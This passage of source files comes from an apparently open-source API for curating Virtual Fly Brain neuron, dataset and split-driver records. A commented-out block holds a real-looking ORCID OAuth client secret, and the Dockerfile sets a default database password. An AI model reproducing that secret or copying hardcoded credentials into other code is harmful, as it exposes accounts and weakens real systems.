"text": "from enum import Enum\n\n\nclass Dataset:\n def __init__(self, id, short_name, title):\n self.id = id\n self.short_name = short_name\n self.title = title\n self.publication = \"\"\n self.projectid = \"\"\n self.source_data = \"\"\n self.description = \"\"\n self.license = \"\"\n\n\n def set_publication(self, publication):\n self.publication = publication\n\n def set_source_data(self, source_data):\n self.source_data = source_data\n\n def set_project_id(self, projectid):\n self.projectid = projectid\n\n def set_description(self, description):\n self.description = description\n\n def set_license(self, license):\n self.license = license\n\n def __repr__(self):\n return '<Dataset %r>' % self.title\n\n\nclass Neuron:\n def __init__(self, primary_name):\n self.primary_name = primary_name # label\n self.id = \"\"\n self.datasetid = \"\"\n self.projectid = \"\"\n # self.type_specimen = \"\" # Removed for now, deal with this via add NeuronType\n self.alternative_names = []\n self.external_identifiers = []\n # self.external_identifiers = dict() # { GO: 001 }\n self.classification = [] # [http://..., ]\n self.classification_comment = \"\"\n # self.url_skeleton_id = \"\"\n self.template_id = \"\" # \"grc2018\"\n self.filename = \"\"\n self.imaging_type = \"\" #computer graphic\n self.part_of = [] # part_of http://purl.obolibrary.org/obo/BFO_0000050\n self.driver_line = [] # expresses http://purl.obolibrary.org/obo/RO_0002292\n self.neuropils = [] # overlaps’ http://purl.obolibrary.org/obo/RO_0002131\n self.input_neuropils = [] # ‘has postsynaptic terminal in’ http://purl.obolibrary.org/obo/RO_0002110\n self.output_neuropils = [] # ‘has presynaptic terminal in’ http://purl.obolibrary.org/obo/RO_0002113\n self.comment = \"\"\n\n def set_id(self, id):\n self.id = id\n\n def set_datasetid(self, datasetid):\n self.datasetid = datasetid\n\n def set_project_id(self, projectid):\n self.projectid = projectid\n\n def set_type_specimen(self, type_specimen):\n self.type_specimen = type_specimen\n\n def set_alternative_names(self, alternative_names):\n self.alternative_names = alternative_names\n\n def set_external_identifiers(self, external_identifiers):\n self.external_identifiers = external_identifiers\n\n def set_classification(self, classification):\n self.classification = classification\n\n def set_filename(self, filename):\n self.filename = filename\n\n def set_neuropils(self, neuropils):\n self.neuropils = neuropils\n\n def set_input_neuropils(self, input_neuropils):\n self.input_neuropils = input_neuropils\n\n def set_output_neuropils(self, output_neuropils):\n self.output_neuropils = output_neuropils\n\n def set_driver_line(self, driver_line):\n self.driver_line = driver_line\n\n def set_part_of(self, part_of):\n self.part_of = part_of\n\n def set_classification_comment(self, classification_comment):\n self.classification_comment = classification_comment\n\n # def set_url_skeleton_id(self, url_skeleton_id):\n # self.url_skeleton_id = url_skeleton_id\n\n def set_template_id(self, template_id):\n self.template_id = template_id\n\n def set_imaging_type(self, imaging_type):\n self.imaging_type = imaging_type\n\n def set_comment(self, comment):\n self.comment = comment\n\n def __repr__(self):\n return '<Neuron %r>' % self.primary_name\n\n\nclass Project:\n def __init__(self, id):\n self.id = id\n self.primary_name = \"\"\n self.description = \"\"\n self.start = 0\n\n def set_primary_name(self, primary_name):\n self.primary_name = primary_name\n\n def set_description(self, description):\n 
self.description = description\n\n def set_start(self, start):\n self.start = start\n\n def __repr__(self):\n return '<Project %r>' % self.id\n\n\nclass User:\n def __init__(self, orcid, primary_name, apikey, role=None, email=None):\n self.orcid = orcid\n self.primary_name = primary_name\n self.apikey = apikey\n self.role = role\n self.email = email\n self.manages_projects = []\n\n def __repr__(self):\n return '<User %r>' % self.id\n\n\nRole = Enum('Role', 'admin user')\n\n\nclass NeuronType:\n def __init__(self, id):\n self.id = id\n self.synonyms = []\n self.parent = \"\"\n # self.supertype = \"\" Why neeed that?\n self.label = \"\"\n self.exemplar = \"\"\n\n\nclass Site:\n def __init__(self, id):\n self.id = id\n self.url = \"\"\n self.short_form = \"\"\n\n\nclass Split:\n def __init__(self, dbd, ad):\n self.id = \"\"\n self.dbd = dbd\n self.ad = ad\n self.synonyms = []\n self.xrefs = []\n\n def set_id(self, split_id):\n self.id = split_id\n\n def set_dbd(self, dbd):\n self.dbd = dbd\n\n def set_ad(self, ad):\n self.ad = ad\n\n def set_synonyms(self, synonyms):\n self.synonyms = synonyms\n\n def set_xrefs(self, xrefs):\n self.xrefs = xrefs\n\n def __repr__(self):\n return '<Split %r>' % self.id\n\n\nclass SplitDriver(Neuron):\n\n def __init__(self, primary_name):\n super().__init__(primary_name)\n self.has_part = []\n\n def set_has_part(self, has_part):\n self.has_part = has_part\n"
},
{
"alpha_fraction": 0.6350975036621094,
"alphanum_fraction": 0.6545960903167725,
"avg_line_length": 30.217391967773438,
"blob_id": "911ffdc352f2817f05c03c4150a4314a5a01bc19",
"content_id": "3be87fed16954c91d128317cd16f52b65691d5ba",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 23,
"path": "/setup.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name='vfb_curation_api',\n version='1.0.0',\n description='An API that encapsulates curation processes of the Virtual Flybrain Project',\n url='https://github.com/VirtualFlyBrain/vfb_curation_api',\n author='Nicolas Matentzoglu',\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Virtual Fly Brain',\n 'License :: Apache License Version 2.0',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='rest flask swagger flask-restplus virtual-fly-brain',\n\n packages=find_packages(),\n\n install_requires=['flask-restplus==0.13', 'Flask-SQLAlchemy==2.4.1'],\n)\n"
},
{
"alpha_fraction": 0.594936728477478,
"alphanum_fraction": 0.6962025165557861,
"avg_line_length": 18.75,
"blob_id": "4a3ab5fbb8d1238276a2bdf66f3b2458ff6c961c",
"content_id": "11aa4971fccc3b3110f4b0a7c5c04884380a07cf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nset -e\ndocker build -t vapi .\ndocker run -p 5000:5000 vapi\n"
},
{
"alpha_fraction": 0.7326968908309937,
"alphanum_fraction": 0.753381073474884,
"avg_line_length": 32.105262756347656,
"blob_id": "f4db545a817ba2bb2fe2b10400c60714dafaee60",
"content_id": "281e6fd29f43d8474ef8a8a1b693345d2832b15b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1257,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 38,
"path": "/Dockerfile",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "FROM python:3.8\n\nENV KBserver=http://localhost:7474\nENV KBuser=neo4j\nENV KBpassword=password\nENV LOAD_TEST_DATA=True\nENV REDIRECT_LOGIN=\"http://localhost:8080/dataingest-ui/user\"\nENV CLIENT_SECRET=\"UNKNOWN\"\nENV CLIENT_ID=\"APP-ENQTIY7Z904S6O1W\"\nENV CLIENT_ID_AUTHORISATION = \"\"\nENV CLIENT_SECRET_AUTHORISATION = \"\"\nENV REDIRECT_URI_AUTHORISATION = \"\"\nENV ENDPOINT_AUTHORISATION_TOKEN = \"\"\n\n\nRUN mkdir /code /code/vfb_curation_api/\nADD requirements.txt run.sh setup.py logging.conf /code/\n\nRUN chmod 777 /code/run.sh\nRUN pip install -r /code/requirements.txt\nADD vfb_curation_api/database /code/vfb_curation_api/database\nADD vfb_curation_api/api /code/vfb_curation_api/api\nADD vfb_curation_api/app.py vfb_curation_api/db.sqlite vfb_curation_api/settings.py /code/vfb_curation_api/\nWORKDIR /code\n\nRUN echo \"Installing VFB neo4j tools\" && \\\ncd /tmp && \\\ngit clone --quiet https://github.com/VirtualFlyBrain/VFB_neo4j.git\n\nRUN pip install -r /tmp/VFB_neo4j/requirements.txt\n\nRUN mkdir -p /code/vfb_curation_api/vfb && \\\nmv /tmp/VFB_neo4j/src/* /code/vfb_curation_api/vfb\n\nRUN cd /code && python3 setup.py develop\nRUN ls -l /code && ls -l /code/vfb_curation_api && ls -l /code/vfb_curation_api/vfb\n\nENTRYPOINT bash -c \"cd /code; python3 vfb_curation_api/app.py\""
},
{
"alpha_fraction": 0.6479928493499756,
"alphanum_fraction": 0.6483497023582458,
"avg_line_length": 38.195804595947266,
"blob_id": "abb2501d4ab96f2bd85b36ad73d40cfd45b16a81",
"content_id": "f06c56dd8f12e1cb9de19f705d28f9e1e057b630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5605,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 143,
"path": "/vfb_curation_api/api/vfbid/business.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import sys\nfrom vfb_curation_api.database.models import Neuron, Dataset, Project, NeuronType, Site, Split, SplitDriver\nfrom vfb_curation_api.database.repository import db\nfrom vfb_curation_api.api.vfbid.errorcodes import UNKNOWNERROR\n\n\ndef create_dataset(data, orcid):\n short_name = data.get('short_name')\n title = data.get('title')\n publication = data.get('publication')\n project = data.get('projectid')\n description = data.get('description')\n source_data = data.get('source_data')\n license = data.get('license')\n ds = Dataset(orcid, short_name, title)\n ds.set_project_id(project)\n ds.set_publication(publication)\n ds.set_source_data(source_data)\n ds.set_description(description)\n ds.set_license(license)\n return db.create_dataset(ds, project, orcid)\n\n\ndef create_neuron(data_all, orcid):\n neurons = []\n for data in data_all['neurons']:\n primary_name = data.get('primary_name')\n type_specimen = data.get('type_specimen')\n alternative_names = data.get('alternative_names')\n external_identifiers = data.get('external_identifiers')\n classification = data.get('classification')\n datasetid = data.get('datasetid')\n classification_comment = data.get('classification_comment')\n url_skeleton_id = data.get('url_skeleton_id')\n template_id = data.get('template_id')\n imaging_type = data.get('imaging_type')\n filename = data.get('filename')\n part_of = data.get('part_of')\n driver_line = data.get('driver_line')\n neuropils = data.get('neuropils')\n input_neuropils = data.get('input_neuropils')\n output_neuropils = data.get('output_neuropils')\n comment = data.get('comment')\n n = Neuron(primary_name)\n n.set_type_specimen(type_specimen)\n n.set_alternative_names(alternative_names)\n n.set_classification(classification)\n n.set_external_identifiers(external_identifiers)\n n.set_template_id(template_id)\n n.set_imaging_type(imaging_type)\n n.set_classification_comment(classification_comment)\n n.set_filename(filename)\n n.set_part_of(part_of)\n n.set_driver_line(driver_line)\n n.set_neuropils(neuropils)\n n.set_input_neuropils(input_neuropils)\n n.set_output_neuropils(output_neuropils)\n n.set_comment(comment)\n neurons.append(n)\n try:\n result = db.create_neuron_db(neurons=neurons,datasetid=datasetid,orcid=orcid)\n return result\n except Exception as e:\n db.clear_neo_logs()\n print(e.with_traceback())\n print(sys.exc_info()[2])\n return db.wrap_error([\"Unknown error has occured while adding neurons ({})\".format(str(type(e)))], UNKNOWNERROR)\n\n\ndef create_project(data):\n projectid = data.get('projectid')\n ds = Project(projectid)\n return db.create_project_db(ds)\n\n\ndef create_neuron_type(data):\n neuron_type_id = data.get('neuron_type_id')\n ds = NeuronType(neuron_type_id)\n return db.create_neuron_type_db(ds)\n\n\ndef valid_user(apikey, orcid):\n return db.valid_user(apikey, orcid)\n\n\ndef create_split(data):\n # split_id = data.get('split_id')\n split = Split(data.get('dbd'), data.get('ad'))\n if 'synonyms' in data:\n split.set_synonyms(data.get('synonyms'))\n if 'xrefs' in data:\n split.set_xrefs(data.get('xrefs'))\n return db.create_split(split)\n\n\ndef create_ep_split(data_all, orcid, ep_split_flp_out=False):\n split_drivers = []\n for data in data_all['split_drivers']:\n primary_name = data.get('primary_name')\n type_specimen = data.get('type_specimen')\n alternative_names = data.get('alternative_names')\n external_identifiers = data.get('external_identifiers')\n classification = data.get('classification')\n datasetid = data.get('datasetid')\n 
classification_comment = data.get('classification_comment')\n url_skeleton_id = data.get('url_skeleton_id')\n template_id = data.get('template_id')\n imaging_type = data.get('imaging_type')\n filename = data.get('filename')\n part_of = data.get('part_of')\n driver_line = data.get('driver_line')\n neuropils = data.get('neuropils')\n input_neuropils = data.get('input_neuropils')\n output_neuropils = data.get('output_neuropils')\n comment = data.get('comment')\n neurons = data.get('split_drivers')\n sd = SplitDriver(primary_name)\n sd.set_type_specimen(type_specimen)\n sd.set_alternative_names(alternative_names)\n sd.set_classification(classification)\n sd.set_external_identifiers(external_identifiers)\n sd.set_template_id(template_id)\n sd.set_imaging_type(imaging_type)\n sd.set_classification_comment(classification_comment)\n sd.set_filename(filename)\n sd.set_part_of(part_of)\n sd.set_driver_line(driver_line)\n sd.set_neuropils(neuropils)\n sd.set_input_neuropils(input_neuropils)\n sd.set_output_neuropils(output_neuropils)\n sd.set_comment(comment)\n sd.set_has_part(neurons)\n\n split_drivers.append(sd)\n try:\n result = db.create_split_driver_db(split_drivers=split_drivers, datasetid=datasetid, orcid=orcid,\n ep_split_flp_out=ep_split_flp_out)\n return result\n except Exception as e:\n db.clear_neo_logs()\n print(e.with_traceback())\n print(sys.exc_info()[2])\n return db.wrap_error([\"Unknown error has occured while adding split driver ({})\".format(str(type(e)))], UNKNOWNERROR)\n"
},
{
"alpha_fraction": 0.6908055543899536,
"alphanum_fraction": 0.6932465434074402,
"avg_line_length": 35.14706039428711,
"blob_id": "3439805ecbd48954bde5f334e685e5c2f4c6c41d",
"content_id": "99bb787bc82c5ab9229ded4dc9e346a7753219bf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/vfb_curation_api/api/vfbid/endpoints/datasets.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import dataset\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('datasets', description='Operations related to lists of datasets')\n\n\[email protected]('/')\[email protected](404, 'No datasets found.')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('projectid', 'The VFB Project ID', required=True)\nclass DatasetList(Resource):\n\n @api.marshal_with(dataset,envelope=\"datasets\")\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('projectid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n projectid = args['projectid']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_all_datasets(projectid, orcid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6108336448669434,
"alphanum_fraction": 0.620053768157959,
"avg_line_length": 37.29411697387695,
"blob_id": "a8f8098a92295b0c6e80f685f95515d3d2532290",
"content_id": "cd9455f57855125d2ef9b4b81d883317d5f3eb8f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2603,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 68,
"path": "/vfb_curation_api/api/vfbid/endpoints/split.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_split, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import split\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('split', description='Operations related to split')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass SplitResource(Resource):\n\n @api.response(201, 'Split successfully created.')\n @api.expect(split)\n def post(self):\n out = dict()\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n splitid = create_split(request.json)\n if isinstance(splitid, dict) and 'error' in splitid:\n return splitid, 403\n return splitid, 201\n out['error'] = \"Invalid API Key\"\n out['code'] = INVALID_APIKEY\n return out, 403\n\n @api.response(404, 'Split not found.')\n @api.param('splitid', 'Split id')\n @api.param('dbd', 'The DBD hemidriver.')\n @api.param('ad', 'The AD hemidriver.')\n # @api.marshal_with(split)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('splitid', type=str)\n parser.add_argument('dbd', type=str)\n parser.add_argument('ad', type=str)\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n\n if valid_user(apikey, orcid):\n if 'splitid' in args and args['splitid']:\n splitid = args['splitid']\n elif 'dbd' in args and 'ad' in args and args['dbd'] and args['ad']:\n splitid = 'VFBexp_' + args['dbd'] + args['ad']\n else:\n return \"{ error: 'splitid or (dbd and ad) should be provided' }\", 403\n\n print(splitid)\n ds = db.get_split(splitid, orcid)\n print(json.dumps(marshal(ds, split)))\n return marshal(ds, split), 201\n return \"{ error: 'Invalid API Key' }\", 403"
},
{
"alpha_fraction": 0.7302913665771484,
"alphanum_fraction": 0.7322114109992981,
"avg_line_length": 69.26984405517578,
"blob_id": "47ad39abe53f9b955ef03e0e27bbc1eb182a63bf",
"content_id": "e74d39b80dbebef3d35a4bdd6bb77117acfe5c81",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8854,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 126,
"path": "/vfb_curation_api/api/vfbid/serializers.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "from flask_restplus import fields\nfrom vfb_curation_api.api.restplus import api\n\n# pagination = api.model('A page of results', {\n# 'page': fields.Integer(description='Number of this page of results'),\n# 'pages': fields.Integer(description='Total number of pages of results'),\n# 'per_page': fields.Integer(description='Number of items per page of results'),\n# 'total': fields.Integer(description='Total number of results'),\n# })\n\ndataset = api.model('Dataset', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this dataset. Will be set automatically.'),\n 'short_name': fields.String(required=True, description='Short id for dataset. No special characters or spaces. Example: WoodHartenstein2018.'),\n 'projectid': fields.String(required=True, description='The four letter ID of your Project.'),\n 'title': fields.String(required=True, description='Human-readable name for dataset. Example: \"L3 neuropils (WoodHartenstein2018)\".'),\n 'publication': fields.String(required=False, description='Associated publication (optional).'),\n 'source_data': fields.String(required=False, description='URL to dataset (optional). Example: \"http://flybase.org/reports/FBrf0221438.html\"'),\n 'description': fields.String(required=False, description='Short description dataset (optional).'),\n 'license': fields.String(required=False, description='License of dataset (optional).'),\n})\n\ndatasetid = api.model('DatasetID', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this dataset.',skip_none=True),\n})\n\nexternal_identifier = api.model('ExternalID', {\n 'resource_id': fields.String(description='The ID of an external resource, such as a website or database (must be valid in VFB).',skip_none=True),\n 'external_id': fields.String(description='The unique identifier of an object, such as a neuron, in the context of the resource.',skip_none=True),\n})\n\n\n\nneuron = api.model('Neuron', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this neuron - will be ignored when posting new neurons.'),\n #'orcid': fields.String(required=True, description='The ORCID of the user'),\n 'primary_name': fields.String(required=True, description='Primary name of the neuron.'),\n 'datasetid': fields.String(required=True, description='Dataset ID.'),\n 'projectid': fields.String(required=False, description='Project ID.'),\n #'type_specimen': fields.String(required=False, description='Type specimen of the neuron (optional)'),\n 'alternative_names': fields.List(fields.String(required=False), description='List of alternative names / synonyms.'),\n 'external_identifiers': fields.List(fields.Nested(external_identifier), description='List of external identifiers.'),\n 'classification': fields.List(fields.String(required=True), description='Type/Superclass of the neuron.'),\n 'classification_comment': fields.String(required=False, description='Additional comment about the type/superclass of the Neuron.'),\n 'template_id': fields.String(required=True, description='ID of the template used (can be found on VFB website)'),\n 'imaging_type': fields.String(required=False, description='Imaging Type'),\n 'filename': fields.String(required=True, description='Name of the file uploaded to VFB (with extension).'),\n 'driver_line': fields.List(fields.String(required=False), description='Driver line'),\n 'neuropils': fields.List(fields.String(required=False), description='Neuropils'),\n 'part_of': fields.List(fields.String(required=False), 
description='Part of'),\n 'input_neuropils': fields.List(fields.String(required=False), description='Input neuropils'),\n 'output_neuropils': fields.List(fields.String(required=False), description='Output neuropils'),\n 'comment': fields.String(required=True, description='Comment about the neuron'),\n})\n\nlist_of_neurons = api.model('NeuronList', {\n 'neurons': fields.List(fields.Nested(neuron))\n})\n#\n# page_of_neurons = api.inherit('Page of datasets', pagination, {\n# 'items': fields.List(fields.Nested(dataset))\n# })\n\nproject = api.model('Project', {\n 'id': fields.String(readonly=True, description='The unique, four-letter identifier for this project.'),\n 'primary_name': fields.String(readonly=False, description='The primary name for this project.'),\n 'description': fields.String(readonly=False, description='Short description of this project project.'),\n 'start': fields.Integer(readonly=False, min=0, description='The start id range for this project.')\n})\n\nuser = api.model('User', {\n 'orcid': fields.String(readonly=True, description='The ORCID for this user.'),\n 'primary_name': fields.String(readonly=False, description='The name of this user.'),\n 'apikey': fields.String(readonly=False, description='The current API key for this user.'),\n 'role': fields.String(readonly=False, description='The role of this user.'),\n 'email': fields.String(readonly=False, description='The email of this user.'),\n 'manages_projects': fields.List(fields.String(readonly=False), description='A list of project ids this user manages.'),\n})\n\nneuron_type = api.model('NeuronType', {\n 'id': fields.String(readonly=True, description='The unique identifier for this neuron type.'),\n 'parent': fields.String(readonly=False, description='The unique identifier of the parent of this neuron type.'),\n 'label': fields.String(readonly=False, description='Unique name for this neuron type.'),\n 'exemplar': fields.String(readonly=False, description='VFB ID of image which serves as the exemplar for this type.'),\n 'synonyms': fields.List(fields.String(readonly=False), description='List of synonyms of this neuron type.'),\n})\n\nsite = api.model('Site', {\n 'id': fields.String(readonly=True, description='The unique identifier for this site or web resource.'),\n 'url': fields.String(readonly=False, description='The unique identifier for this site or web resource.'),\n 'short_form': fields.String(readonly=False, description='Short description of this site or web resource.'),\n})\n\nsplit = api.model('Split', {\n 'id': fields.String(readonly=True, description='The unique identifier for this split.'),\n 'dbd': fields.String(readonly=False, description='The DNA-binding domain (DBD) hemidriver.'),\n 'ad': fields.String(readonly=False, description='The activation domain (AD) hemidriver.'),\n 'synonyms': fields.List(fields.String(readonly=False), description='List of synonyms of this split.'),\n 'xrefs': fields.List(fields.String(required=False), description='Associated xrefs.'),\n})\n\nsplit_driver = api.model('SplitDriver', {\n 'id': fields.String(readonly=True, description='The unique VFB identifier for this split driver - will be ignored when posting new split drivers.'),\n #'orcid': fields.String(required=True, description='The ORCID of the user'),\n 'primary_name': fields.String(required=True, description='Primary name of the split driver.'),\n 'datasetid': fields.String(required=True, description='Dataset ID.'),\n 'projectid': fields.String(required=False, description='Project ID.'),\n #'type_specimen': 
fields.String(required=False, description='Type specimen of the neuron (optional)'),\n 'alternative_names': fields.List(fields.String(required=False), description='List of alternative names / synonyms.'),\n 'external_identifiers': fields.List(fields.Nested(external_identifier), description='List of external identifiers.'),\n 'classification': fields.List(fields.String(required=True), description='Type/Superclass of the split driver.'),\n 'classification_comment': fields.String(required=False, description='Additional comment about the type/superclass of the split driver.'),\n 'template_id': fields.String(required=True, description='ID of the template used (can be found on VFB website)'),\n 'imaging_type': fields.String(required=False, description='Imaging Type'),\n 'filename': fields.String(required=True, description='Name of the file uploaded to VFB (with extension).'),\n 'driver_line': fields.List(fields.String(required=False), description='Driver line'),\n 'neuropils': fields.List(fields.String(required=False), description='Neuropils'),\n 'part_of': fields.List(fields.String(required=False), description='Part of'),\n 'input_neuropils': fields.List(fields.String(required=False), description='Input neuropils'),\n 'output_neuropils': fields.List(fields.String(required=False), description='Output neuropils'),\n 'comment': fields.String(required=True, description='Comment about the split driver'),\n 'has_part': fields.List(fields.String(required=False), description='List of neurons to annotate via has_part'),\n})\n\nlist_of_split_drivers = api.model('SplitDriverList', {\n 'split_drivers': fields.List(fields.Nested(split_driver))\n})\n"
},
{
"alpha_fraction": 0.7193877696990967,
"alphanum_fraction": 0.7385203838348389,
"avg_line_length": 51.33333206176758,
"blob_id": "d5afdc7ff252c8d28b064ad52431162aaac7cce1",
"content_id": "f97a2921fbab70d25123ee31a88e6d8d9207337d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 15,
"path": "/vfb_curation_api/database/repository/__init__.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import os\nfrom vfb_curation_api.database.repository.repository import VFBKB\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME (reporistor/__init__.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# print(\"SETTTTTTIIINNNNG ENVIRONMENT PLEASE KILL ME.\")\n# os.environ[\"KBserver\"] = \"http://localhost:7474\"\n# os.environ[\"KBuser\"] = \"neo4j\"\n# os.environ[\"KBpassword\"] = \"neo\"\n# os.environ[\"LOAD_TEST_DATA\"] = \"True\"\n# os.environ['CLIENT_ID_AUTHORISATION'] = \"APP-ENQTIY7Z904S6O1W\"\n# os.environ['CLIENT_SECRET_AUTHORISATION'] = \"4ad3c8ae-2359-44c1-af6a-59c3ce50e3f6\"\n# os.environ['REDIRECT_URI_AUTHORISATION'] = \"http://localhost:8080/dataingest-ui/login\"\n# os.environ['ENDPOINT_AUTHORISATION_TOKEN'] = \"https://orcid.org/oauth/token\"\ndb = VFBKB()"
},
{
"alpha_fraction": 0.519336998462677,
"alphanum_fraction": 0.7182320356369019,
"avg_line_length": 15.545454978942871,
"blob_id": "1747f5b171f3b2b5020bb2629041528f17118882",
"content_id": "ec2bfadbb186e90441bd9f8777faf4aef769e767",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 181,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "flask-restplus==0.13\nFlask-SQLAlchemy==2.4.1\nneo4jrestclient==2.1.1\nbase36==0.1.1\nflask==1.1.1\nWerkzeug==0.16.0\npsycopg2==2.8.4\norcid==1.0.3\nJinja2==3.0.3\nitsdangerous==2.0.1\npandas"
},
{
"alpha_fraction": 0.5319029092788696,
"alphanum_fraction": 0.5420666337013245,
"avg_line_length": 34.77777862548828,
"blob_id": "b61eaa669438df7dc8f8beff6ed23342766cf77f",
"content_id": "a006c7ea057313ce8694caf7d98680d365b24a2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3542,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 99,
"path": "/vfb_curation_api/api/vfbid/endpoints/neuron.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask import request\nfrom flask_restplus import Resource\nfrom vfb_curation_api.api.vfbid.business import create_neuron, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import neuron, list_of_neurons\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.database.repository import db\nfrom flask_restplus import reqparse, marshal\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neuron', description='Operations related to neurons')\n\nparser = reqparse.RequestParser()\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass NeuronResource(Resource):\n @api.response(201, 'Neuron successfully created.')\n @api.expect(list_of_neurons)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n out = dict()\n try:\n if valid_user(apikey, orcid):\n nid = create_neuron(request.json, orcid)\n if isinstance(nid,dict) and 'error' in nid:\n return nid\n else:\n n = db.get_neuron(nid, orcid=orcid)\n print(\"0-0-0-0-0-0\")\n print(n)\n if isinstance(n, list) \\\n and any(isinstance(n_result, dict) for n_result in n) \\\n and any(\"error\" in n_result for n_result in n):\n return n, 403\n elif isinstance(n, dict) and 'error' in n:\n return n, 403\n else:\n out['neurons'] = marshal(n, neuron)\n return out, 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n\n\n @api.param('neuronid', 'Neuron id', required=True)\n @api.response(404, 'Dataset not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('neuronid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n neuronid = args['neuronid']\n return get_neuron(apikey, orcid, neuronid)\n\n\ndef get_neuron(self, 